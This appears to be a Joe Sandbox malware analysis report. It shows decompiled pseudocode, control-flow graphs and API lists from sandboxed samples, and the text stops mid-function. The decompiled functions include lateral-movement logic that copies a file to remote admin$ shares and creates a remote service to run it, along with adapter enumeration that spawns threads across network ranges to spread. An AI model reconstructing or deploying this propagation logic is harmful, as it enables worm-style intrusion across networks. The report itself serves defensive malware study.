                                                                                                                                                  • Opcode ID: 119e4a5c4e49fca7c17498290489cfe213306658b47fb0a8c5444fd9a1617de3
                                                                                                                                                  • Instruction ID: 765a2b68a7498b3ab5f748f0199c0c994a5a833c252eecff751bbfb4c949c7d4
                                                                                                                                                  • Opcode Fuzzy Hash: 119e4a5c4e49fca7c17498290489cfe213306658b47fb0a8c5444fd9a1617de3
                                                                                                                                                  • Instruction Fuzzy Hash: ABE092B39681025EDA24BA628C88D37266CDBC0700B58C03FA805A61D7CA3CFC01D53F
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                  			E00411344(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				char _v264;
                                                                                                                                                  				char _v520;
                                                                                                                                                  				char _v524;
                                                                                                                                                  				signed char _t47;
                                                                                                                                                  				intOrPtr* _t59;
                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                  				intOrPtr* _t75;
                                                                                                                                                  				void* _t78;
                                                                                                                                                  
                                                                                                                                                  				_v524 = 0;
                                                                                                                                                  				_t75 = __edx;
                                                                                                                                                  				_t47 = __eax;
                                                                                                                                                  				_push(_t78);
                                                                                                                                                  				_push(0x41146a);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t78 + 0xfffffdf8;
                                                                                                                                                  				_t73 = __eax & 0x00000fff;
                                                                                                                                                  				if((__eax & 0x00000fff) > 0x14) {
                                                                                                                                                  					if(__eax != 0x100) {
                                                                                                                                                  						if(__eax != 0x101) {
                                                                                                                                                  							if(E004117A0(__eax,  &_v8) == 0) {
                                                                                                                                                  								E00409A68( &_v524, 4);
                                                                                                                                                  								_t59 =  *0x4186b0; // 0x418270
                                                                                                                                                  								E00403C94(_t75, _v524,  *_t59);
                                                                                                                                                  							} else {
                                                                                                                                                  								E00402E70( *_v8,  &_v520);
                                                                                                                                                  								E0040275C( &_v520, 0x7fffffff, 2,  &_v264);
                                                                                                                                                  								E00403C10(__edx,  &_v264);
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							E00403A00(__edx, 0x411490);
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						E00403A00(__edx, "String");
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					E00403A00(__edx,  *((intOrPtr*)(0x418468 + (_t73 & 0x0000ffff) * 4)));
                                                                                                                                                  				}
                                                                                                                                                  				if((_t47 & 0x00000020) != 0) {
                                                                                                                                                  					E00403C94(_t75,  *_t75, "Array ");
                                                                                                                                                  				}
                                                                                                                                                  				if((_t47 & 0x00000040) != 0) {
                                                                                                                                                  					E00403C94(_t75,  *_t75, "ByRef ");
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t61);
                                                                                                                                                  				 *[fs:eax] = _t61;
                                                                                                                                                  				_push(E00411471);
                                                                                                                                                  				return E004039AC( &_v524);
                                                                                                                                                  			}












                                                                                                                                                  0x00411352
                                                                                                                                                  0x00411358
                                                                                                                                                  0x0041135a
                                                                                                                                                  0x0041135e
                                                                                                                                                  0x0041135f
                                                                                                                                                  0x00411364
                                                                                                                                                  0x00411367
                                                                                                                                                  0x0041136c
                                                                                                                                                  0x00411375
                                                                                                                                                  0x00411392
                                                                                                                                                  0x004113aa
                                                                                                                                                  0x004113c6
                                                                                                                                                  0x00411411
                                                                                                                                                  0x0041141c
                                                                                                                                                  0x00411426
                                                                                                                                                  0x004113c8
                                                                                                                                                  0x004113da
                                                                                                                                                  0x004113ef
                                                                                                                                                  0x004113fc
                                                                                                                                                  0x004113fc
                                                                                                                                                  0x004113ac
                                                                                                                                                  0x004113b3
                                                                                                                                                  0x004113b3
                                                                                                                                                  0x00411394
                                                                                                                                                  0x0041139b
                                                                                                                                                  0x0041139b
                                                                                                                                                  0x00411377
                                                                                                                                                  0x00411383
                                                                                                                                                  0x00411383
                                                                                                                                                  0x0041142e
                                                                                                                                                  0x00411439
                                                                                                                                                  0x00411439
                                                                                                                                                  0x00411441
                                                                                                                                                  0x0041144c
                                                                                                                                                  0x0041144c
                                                                                                                                                  0x00411453
                                                                                                                                                  0x00411456
                                                                                                                                                  0x00411459
                                                                                                                                                  0x00411469

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Any$Array $ByRef $String
                                                                                                                                                  • API String ID: 0-2719049652
                                                                                                                                                  • Opcode ID: 389b1a4c981d8c9ac40f03055e0685b97b8a94a69abb4050b5030a4c73244b48
                                                                                                                                                  • Instruction ID: 759db39838c32d1211e4e8916265be04126e20bad23ac840fd781b46fc79011b
                                                                                                                                                  • Opcode Fuzzy Hash: 389b1a4c981d8c9ac40f03055e0685b97b8a94a69abb4050b5030a4c73244b48
                                                                                                                                                  • Instruction Fuzzy Hash: 35210A347041144BD720EF15C8456EA77A9EB88B04F6141BBBB55A33E2CB7C9EC18A9D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 60 4779534-477955a call 477a760 63 4779560-4779604 wsprintfW call 47788d3 wsprintfW * 2 PathFindExtensionW 60->63 64 477985f 60->64 70 4779606-4779608 63->70 71 477960b-4779625 wsprintfW 63->71 65 4779867-477986c 64->65 67 4779874-4779888 SetLastError 65->67 68 477986e-4779872 65->68 68->67 70->71 72 477962a-4779651 WNetAddConnection2W PathFileExistsW 71->72 73 4779653-4779669 GetLastError call 47787e7 72->73 74 47796c8-47796d0 72->74 77 477966e-4779672 73->77 75 4779844-4779849 74->75 75->65 78 477984b-477985d WNetCancelConnection2W 75->78 79 47796d5-47796d8 77->79 80 4779674-477967d GetLastError 77->80 78->65 81 47796f4-4779720 call 477944f OpenSCManagerW 79->81 82 47796da-47796dd 79->82 80->75 83 4779683-4779686 80->83 92 4779726-477978f memset GetSystemTimeAsFileTime wsprintfW CreateServiceW 81->92 93 477982a-477982c GetLastError 81->93 82->81 85 47796df-47796ea call 47768b5 82->85 83->75 84 477968c-477968f 83->84 84->75 87 4779695-477969d 84->87 85->81 87->75 90 47796a3-47796a7 87->90 90->65 94 47796ad-47796c3 WNetCancelConnection2W 90->94 96 4779791-47797a4 StartServiceW 92->96 97 4779809-4779814 GetLastError 92->97 95 4779830-4779834 93->95 94->72 95->75 100 4779836-477983e DeleteFileW 95->100 101 47797a6-47797b1 GetLastError 96->101 102 47797c2-47797c7 96->102 98 4779816 97->98 99 477981e-4779828 CloseServiceHandle 97->99 98->99 99->95 100->75 103 47797b3-47797b8 101->103 104 47797ba 101->104 105 47797cc-47797dd QueryServiceStatus 102->105 103->104 106 47797f3-4779807 DeleteService CloseServiceHandle 103->106 104->102 105->106 107 47797df-47797e4 105->107 106->99 107->106 108 47797e6-47797f1 Sleep 107->108 108->105 108->106
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04779534(int _a4, short* _a8, int _a12, short** _a16, long _a32, int _a36, void _a40, int _a44, void* _a48, struct _FILETIME _a52, void* _a56, struct _NETRESOURCE _a60, struct _SERVICE_STATUS _a100, intOrPtr _a104, short _a120, void _a122, short _a128, short _a152, char _a160, short _a184, char _a676, char _a680, char _a684, short _a1204, short _a1216, short _a1224, short _a3244, short _a3272, short _a5300, short _a5308, char _a7368, short _a7376) {
                                                                                                                                                  				int _v0;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				short** _t78;
                                                                                                                                                  				WCHAR* _t96;
                                                                                                                                                  				int _t100;
                                                                                                                                                  				int _t102;
                                                                                                                                                  				void* _t107;
                                                                                                                                                  				void* _t111;
                                                                                                                                                  				void* _t123;
                                                                                                                                                  				long _t124;
                                                                                                                                                  				int _t126;
                                                                                                                                                  				long _t131;
                                                                                                                                                  				long _t133;
                                                                                                                                                  				int _t137;
                                                                                                                                                  				signed int _t143;
                                                                                                                                                  				WCHAR* _t151;
                                                                                                                                                  				void* _t153;
                                                                                                                                                  
                                                                                                                                                  				E0477A760(0x11cac);
                                                                                                                                                  				_t137 = _a4;
                                                                                                                                                  				_a4 = 0;
                                                                                                                                                  				_v0 = 0;
                                                                                                                                                  				_a12 = 0;
                                                                                                                                                  				if(_t137 == 0) {
                                                                                                                                                  					_v0 = 0x57;
                                                                                                                                                  					goto L36;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a152 = 0;
                                                                                                                                                  					wsprintfW( &_a152, L"\\\\%s\\admin$", _t137);
                                                                                                                                                  					_a36 = 0;
                                                                                                                                                  					_t143 = 7;
                                                                                                                                                  					memset( &_a40, 0, _t143 << 2);
                                                                                                                                                  					_a56 =  &_a160;
                                                                                                                                                  					_a40 = 1;
                                                                                                                                                  					E047788D3( &_a680);
                                                                                                                                                  					_t151 = L"\\\\%ws\\admin$\\%ws";
                                                                                                                                                  					wsprintfW( &_a3244, _t151, _t137,  &_a676);
                                                                                                                                                  					_a5300 = 0;
                                                                                                                                                  					_a1204 = 0;
                                                                                                                                                  					wsprintfW( &_a5300, _t151, _t137,  &_a684);
                                                                                                                                                  					_t96 = PathFindExtensionW( &_a5308);
                                                                                                                                                  					if(_t96 != 0) {
                                                                                                                                                  						 *_t96 = 0;
                                                                                                                                                  					}
                                                                                                                                                  					wsprintfW( &_a1216, _t151, _t137, L"cscc.dat");
                                                                                                                                                  					_a40 = _a40 & 0x00000000;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						_t100 = WNetAddConnection2W( &_a60, _a12, _a8, 0); // executed
                                                                                                                                                  						_a44 = _t100;
                                                                                                                                                  						_t102 = PathFileExistsW( &_a1224); // executed
                                                                                                                                                  						if(_t102 != 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						GetLastError();
                                                                                                                                                  						_t107 = E047787E7( *0x4787b94,  &_a3272,  *0x4783984); // executed
                                                                                                                                                  						if(_t107 != 0) {
                                                                                                                                                  							if(_a8 != 0 && _a12 != 0) {
                                                                                                                                                  								E047768B5(_a8, _a12);
                                                                                                                                                  								 *0x4783010 = 1;
                                                                                                                                                  							}
                                                                                                                                                  							_a7368 = 0;
                                                                                                                                                  							E0477944F( &_a7368);
                                                                                                                                                  							_t111 = OpenSCManagerW(_a4, 0, 0xf003f);
                                                                                                                                                  							_a44 = _t111;
                                                                                                                                                  							if(_t111 == 0) {
                                                                                                                                                  								_a32 = GetLastError();
                                                                                                                                                  								goto L31;
                                                                                                                                                  							} else {
                                                                                                                                                  								_a120 = 0;
                                                                                                                                                  								memset( &_a122, 0, 0x3e);
                                                                                                                                                  								GetSystemTimeAsFileTime( &_a52);
                                                                                                                                                  								wsprintfW( &_a120, L"%08X%08X", _a56, _a52.dwLowDateTime);
                                                                                                                                                  								_t123 = CreateServiceW(_a56,  &_a128, 0, 0xf01ff, 0x10, 3, 0,  &_a7376, 0, 0, 0, 0, 0);
                                                                                                                                                  								_a48 = _t123;
                                                                                                                                                  								if(_t123 == 0) {
                                                                                                                                                  									_t124 = GetLastError();
                                                                                                                                                  									_a40 = _t124;
                                                                                                                                                  									if(_t124 == 0x431) {
                                                                                                                                                  										_a44 = 1;
                                                                                                                                                  									}
                                                                                                                                                  									L29:
                                                                                                                                                  									CloseServiceHandle(_a56);
                                                                                                                                                  									L31:
                                                                                                                                                  									if(_a36 == 0) {
                                                                                                                                                  										DeleteFileW( &_a3272);
                                                                                                                                                  									}
                                                                                                                                                  									L33:
                                                                                                                                                  									if(_a44 == 0) {
                                                                                                                                                  										WNetCancelConnection2W( &_a184, 0, 1);
                                                                                                                                                  									}
                                                                                                                                                  									L36:
                                                                                                                                                  									_t78 = _a16;
                                                                                                                                                  									if(_t78 != 0) {
                                                                                                                                                  										 *_t78 = _a12;
                                                                                                                                                  									}
                                                                                                                                                  									SetLastError(_v0);
                                                                                                                                                  									return _a4;
                                                                                                                                                  								}
                                                                                                                                                  								_a40 = 0;
                                                                                                                                                  								_t126 = StartServiceW(_t123, 0, 0);
                                                                                                                                                  								_a44 = _t126;
                                                                                                                                                  								if(_t126 != 0) {
                                                                                                                                                  									L22:
                                                                                                                                                  									_t153 = 0xea60;
                                                                                                                                                  									while(QueryServiceStatus(_a48,  &_a100) != 0 && _a104 != 1) {
                                                                                                                                                  										Sleep(0x1388);
                                                                                                                                                  										_t153 = _t153 - 0x1388;
                                                                                                                                                  										if(_t153 > 0) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									L26:
                                                                                                                                                  									DeleteService(_a48);
                                                                                                                                                  									CloseServiceHandle(_a48);
                                                                                                                                                  									goto L29;
                                                                                                                                                  								}
                                                                                                                                                  								_t131 = GetLastError();
                                                                                                                                                  								_a40 = _t131;
                                                                                                                                                  								if(_t131 == 0x41d || _t131 == 0x420) {
                                                                                                                                                  									_a44 = 1;
                                                                                                                                                  									goto L22;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L26;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_t133 = GetLastError();
                                                                                                                                                  						_a32 = _t133;
                                                                                                                                                  						if(_t133 == 0x50 || _t133 == 0x35 || _t133 == 0x43 || _a44 != 0x4c3) {
                                                                                                                                                  							goto L33;
                                                                                                                                                  						} else {
                                                                                                                                                  							if(_a40 != 0) {
                                                                                                                                                  								goto L36;
                                                                                                                                                  							}
                                                                                                                                                  							WNetCancelConnection2W( &_a184, 0, 1);
                                                                                                                                                  							_a40 = 1;
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_a36 = 1;
                                                                                                                                                  					goto L33;
                                                                                                                                                  				}
                                                                                                                                                  			}




















                                                                                                                                                  0x0477953f
                                                                                                                                                  0x04779545
                                                                                                                                                  0x0477954c
                                                                                                                                                  0x04779550
                                                                                                                                                  0x04779554
                                                                                                                                                  0x0477955a
                                                                                                                                                  0x0477985f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779560
                                                                                                                                                  0x04779569
                                                                                                                                                  0x0477957e
                                                                                                                                                  0x04779585
                                                                                                                                                  0x0477958b
                                                                                                                                                  0x04779590
                                                                                                                                                  0x04779599
                                                                                                                                                  0x047795a5
                                                                                                                                                  0x047795ad
                                                                                                                                                  0x047795bb
                                                                                                                                                  0x047795c9
                                                                                                                                                  0x047795cd
                                                                                                                                                  0x047795d5
                                                                                                                                                  0x047795ef
                                                                                                                                                  0x047795fc
                                                                                                                                                  0x04779604
                                                                                                                                                  0x04779608
                                                                                                                                                  0x04779608
                                                                                                                                                  0x0477961a
                                                                                                                                                  0x04779625
                                                                                                                                                  0x0477962a
                                                                                                                                                  0x04779637
                                                                                                                                                  0x0477963d
                                                                                                                                                  0x04779649
                                                                                                                                                  0x04779651
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779653
                                                                                                                                                  0x04779669
                                                                                                                                                  0x04779672
                                                                                                                                                  0x047796d8
                                                                                                                                                  0x047796e5
                                                                                                                                                  0x047796ea
                                                                                                                                                  0x047796ea
                                                                                                                                                  0x047796f6
                                                                                                                                                  0x04779706
                                                                                                                                                  0x04779714
                                                                                                                                                  0x0477971a
                                                                                                                                                  0x04779720
                                                                                                                                                  0x0477982c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779726
                                                                                                                                                  0x0477972a
                                                                                                                                                  0x04779735
                                                                                                                                                  0x04779742
                                                                                                                                                  0x0477975a
                                                                                                                                                  0x04779783
                                                                                                                                                  0x04779789
                                                                                                                                                  0x0477978f
                                                                                                                                                  0x04779809
                                                                                                                                                  0x0477980b
                                                                                                                                                  0x04779814
                                                                                                                                                  0x04779816
                                                                                                                                                  0x04779816
                                                                                                                                                  0x0477981e
                                                                                                                                                  0x04779822
                                                                                                                                                  0x04779830
                                                                                                                                                  0x04779834
                                                                                                                                                  0x0477983e
                                                                                                                                                  0x0477983e
                                                                                                                                                  0x04779844
                                                                                                                                                  0x04779849
                                                                                                                                                  0x04779857
                                                                                                                                                  0x04779857
                                                                                                                                                  0x04779867
                                                                                                                                                  0x04779867
                                                                                                                                                  0x0477986c
                                                                                                                                                  0x04779872
                                                                                                                                                  0x04779872
                                                                                                                                                  0x04779878
                                                                                                                                                  0x04779888
                                                                                                                                                  0x04779888
                                                                                                                                                  0x04779794
                                                                                                                                                  0x04779798
                                                                                                                                                  0x0477979e
                                                                                                                                                  0x047797a4
                                                                                                                                                  0x047797c2
                                                                                                                                                  0x047797c2
                                                                                                                                                  0x047797cc
                                                                                                                                                  0x047797e7
                                                                                                                                                  0x047797ed
                                                                                                                                                  0x047797f1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047797f1
                                                                                                                                                  0x047797f3
                                                                                                                                                  0x047797f7
                                                                                                                                                  0x04779801
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04779801
                                                                                                                                                  0x047797a6
                                                                                                                                                  0x047797a8
                                                                                                                                                  0x047797b1
                                                                                                                                                  0x047797ba
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047797b1
                                                                                                                                                  0x04779720
                                                                                                                                                  0x04779674
                                                                                                                                                  0x04779676
                                                                                                                                                  0x0477967d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047796a3
                                                                                                                                                  0x047796a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047796b9
                                                                                                                                                  0x047796bf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047796bf
                                                                                                                                                  0x0477967d
                                                                                                                                                  0x047796c8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047796c8

                                                                                                                                                  APIs
                                                                                                                                                  • wsprintfW.USER32 ref: 0477957E
                                                                                                                                                    • Part of subcall function 047788D3: PathFindFileNameW.SHLWAPI(04787BC8,7491C0B0,?,047795B2), ref: 047788E3
                                                                                                                                                  • wsprintfW.USER32 ref: 047795C9
                                                                                                                                                  • wsprintfW.USER32 ref: 047795EF
                                                                                                                                                  • PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 047795FC
                                                                                                                                                  • wsprintfW.USER32 ref: 0477961A
                                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04779637
                                                                                                                                                  • PathFileExistsW.KERNELBASE(?), ref: 04779649
                                                                                                                                                  • GetLastError.KERNEL32 ref: 04779653
                                                                                                                                                  • GetLastError.KERNEL32(?), ref: 04779674
                                                                                                                                                  • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 047796B9
                                                                                                                                                  • OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 04779714
                                                                                                                                                  • memset.MSVCRT ref: 04779735
                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04779742
                                                                                                                                                  • wsprintfW.USER32 ref: 0477975A
                                                                                                                                                  • CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 04779783
                                                                                                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04779798
                                                                                                                                                  • GetLastError.KERNEL32 ref: 047797A6
                                                                                                                                                  • QueryServiceStatus.ADVAPI32(?,?), ref: 047797D5
                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 047797E7
                                                                                                                                                  • DeleteService.ADVAPI32(?), ref: 047797F7
                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?), ref: 04779801
                                                                                                                                                  • GetLastError.KERNEL32 ref: 04779809
                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?), ref: 04779822
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0477982A
                                                                                                                                                    • Part of subcall function 047768B5: GetProcessHeap.KERNEL32(00000008,?,7491C0B0,00000000), ref: 047768EB
                                                                                                                                                    • Part of subcall function 047768B5: HeapAlloc.KERNEL32(00000000), ref: 047768F4
                                                                                                                                                    • Part of subcall function 047768B5: memcpy.MSVCRT ref: 04776921
                                                                                                                                                    • Part of subcall function 047768B5: GetProcessHeap.KERNEL32(00000008,?,74CB4D40), ref: 04776946
                                                                                                                                                    • Part of subcall function 047768B5: HeapAlloc.KERNEL32(00000000), ref: 04776949
                                                                                                                                                    • Part of subcall function 047768B5: memcpy.MSVCRT ref: 04776978
                                                                                                                                                    • Part of subcall function 047768B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04776995
                                                                                                                                                    • Part of subcall function 047768B5: HeapFree.KERNEL32(00000000), ref: 04776998
                                                                                                                                                    • Part of subcall function 047768B5: GetProcessHeap.KERNEL32(00000000,?), ref: 0477699F
                                                                                                                                                    • Part of subcall function 047768B5: HeapFree.KERNEL32(00000000), ref: 047769A2
                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0477983E
                                                                                                                                                  • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04779857
                                                                                                                                                  • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,0477A0AD,00000000,00000000,00000000,00000000,04776AA8,00000000,00000000,00000000,00000024,04776AA8), ref: 04779878
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
                                                                                                                                                  • String ID: %08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
                                                                                                                                                  • API String ID: 719309661-1529897384
                                                                                                                                                  • Opcode ID: 8b7ba9610f09e580f2bf17949e9a71bfed9cc2776707306231052870f36cced9
                                                                                                                                                  • Instruction ID: e39f3d350f4682456eb95f864dc639c14091ca85bb2e19cd63a119e4d4d5b49d
                                                                                                                                                  • Opcode Fuzzy Hash: 8b7ba9610f09e580f2bf17949e9a71bfed9cc2776707306231052870f36cced9
                                                                                                                                                  • Instruction Fuzzy Hash: 019118B1509345AFEB209F64D888A9BB7E9FF84304F84492EF685C2250E774E945CB92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 136 4778b2e-4778b94 call 477a760 memset * 2 GetAdaptersInfo 139 4778d2e-4778d36 136->139 140 4778b9a-4778bae LocalAlloc 136->140 140->139 141 4778bb4-4778bbe GetAdaptersInfo 140->141 142 4778d24-4778d28 LocalFree 141->142 143 4778bc4-4778bcc 141->143 142->139 144 4778c77-4778c7e call 4777d4e 143->144 145 4778bd2-4778c12 inet_addr * 2 call 477641a 143->145 150 4778c80-4778c83 call 4778d39 144->150 151 4778c88-4778c8c 144->151 152 4778c14-4778c2b call 4776b95 GetProcessHeap HeapFree 145->152 153 4778c31-4778c37 145->153 150->151 155 4778c8e 151->155 156 4778d0d-4778d11 151->156 152->153 158 4778c69-4778c71 153->158 159 4778c39-4778c4b call 477641a 153->159 162 4778c94-4778ca2 LocalAlloc 155->162 156->142 161 4778d13-4778d22 CloseHandle 156->161 158->143 158->144 159->158 167 4778c4d-4778c63 call 4776b95 GetProcessHeap HeapFree 159->167 161->142 161->161 165 4778ca4-4778cc3 inet_addr 162->165 166 4778cff-4778d0b 162->166 165->166 168 4778cc5-4778ccd 165->168 166->156 166->162 167->158 168->166 169 4778ccf-4778cf5 htonl * 2 CreateThread 168->169 169->166 171 4778cf7-4778cfb 169->171 171->166
                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                  			E04778B2E(intOrPtr* _a4, void* _a8, int _a16, void _a20, int _a4112, void _a4116) {
                                                                                                                                                  				int _v0;
                                                                                                                                                  				int _v4;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				void* _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				signed int _v32;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				void* _t73;
                                                                                                                                                  				void* _t75;
                                                                                                                                                  				signed int _t77;
                                                                                                                                                  				signed int _t80;
                                                                                                                                                  				void _t81;
                                                                                                                                                  				void* _t84;
                                                                                                                                                  				void* _t93;
                                                                                                                                                  				void* _t100;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _t101;
                                                                                                                                                  				signed int _t105;
                                                                                                                                                  				signed int _t108;
                                                                                                                                                  				signed int _t109;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				intOrPtr* _t112;
                                                                                                                                                  				intOrPtr* _t113;
                                                                                                                                                  				void* _t114;
                                                                                                                                                  				intOrPtr* _t115;
                                                                                                                                                  				void* _t117;
                                                                                                                                                  				signed int _t122;
                                                                                                                                                  				void* _t125;
                                                                                                                                                  
                                                                                                                                                  				E0477A760(0x3014);
                                                                                                                                                  				_t101 = 0;
                                                                                                                                                  				_a16 = 0;
                                                                                                                                                  				memset( &_a20, 0, 0xffc);
                                                                                                                                                  				_a4112 = 0;
                                                                                                                                                  				memset( &_a4116, 0, 0x1ffc);
                                                                                                                                                  				_t115 = __imp__GetAdaptersInfo;
                                                                                                                                                  				_t125 = (_t122 & 0xfffffff8) + 0x18;
                                                                                                                                                  				_a8 = 0;
                                                                                                                                                  				_v4 = 0;
                                                                                                                                                  				_v0 = 0;
                                                                                                                                                  				_t69 =  *_t115(0,  &_a8, _t110, _t114, _t100); // executed
                                                                                                                                                  				if(_t69 != 0x6f) {
                                                                                                                                                  					L23:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t112 = LocalAlloc(0x40, _v0);
                                                                                                                                                  				_a4 = _t112;
                                                                                                                                                  				if(_t112 == 0) {
                                                                                                                                                  					goto L23;
                                                                                                                                                  				}
                                                                                                                                                  				_t73 =  *_t115(_t112,  &_v0); // executed
                                                                                                                                                  				if(_t73 != 0) {
                                                                                                                                                  					L22:
                                                                                                                                                  					LocalFree(_v4);
                                                                                                                                                  					goto L23;
                                                                                                                                                  				}
                                                                                                                                                  				while(_v20 < 0x400) {
                                                                                                                                                  					if( *((intOrPtr*)(_t112 + 0x1a4)) != _t101) {
                                                                                                                                                  						_t28 = _t112 + 0x200; // 0x200
                                                                                                                                                  						_t93 = E0477641A(_t28);
                                                                                                                                                  						_v24 = _t93;
                                                                                                                                                  						if(_t93 != _t101) {
                                                                                                                                                  							E04776B95(_t93, 0, _a4);
                                                                                                                                                  							HeapFree(GetProcessHeap(), _t101, _v24);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t112 =  *_t112;
                                                                                                                                                  					_v28 = _v28 + 1;
                                                                                                                                                  					if(_t112 != _t101) {
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					break;
                                                                                                                                                  				}
                                                                                                                                                  				_t75 = E04777D4E(_t103); // executed
                                                                                                                                                  				if(_t75 != 0) {
                                                                                                                                                  					E04778D39(_a4);
                                                                                                                                                  				}
                                                                                                                                                  				if(_v20 <= _t101) {
                                                                                                                                                  					L20:
                                                                                                                                                  					if(_v16 <= _t101) {
                                                                                                                                                  						goto L22;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L21;
                                                                                                                                                  					}
                                                                                                                                                  					do {
                                                                                                                                                  						L21:
                                                                                                                                                  						CloseHandle( *(_t125 + 0x20 + _t101 * 4));
                                                                                                                                                  						_t101 =  &(_t101->nLength);
                                                                                                                                                  					} while (_t101 < _v16);
                                                                                                                                                  					goto L22;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t113 = __imp__#14;
                                                                                                                                                  					do {
                                                                                                                                                  						_t77 = LocalAlloc(0x40, 0xc);
                                                                                                                                                  						_t117 = _t77;
                                                                                                                                                  						if(_t117 != _t101) {
                                                                                                                                                  							__imp__#11("255.255.255.255");
                                                                                                                                                  							_t108 = _v20;
                                                                                                                                                  							_t109 =  *(_t125 + 0x1024 + _t108 * 8);
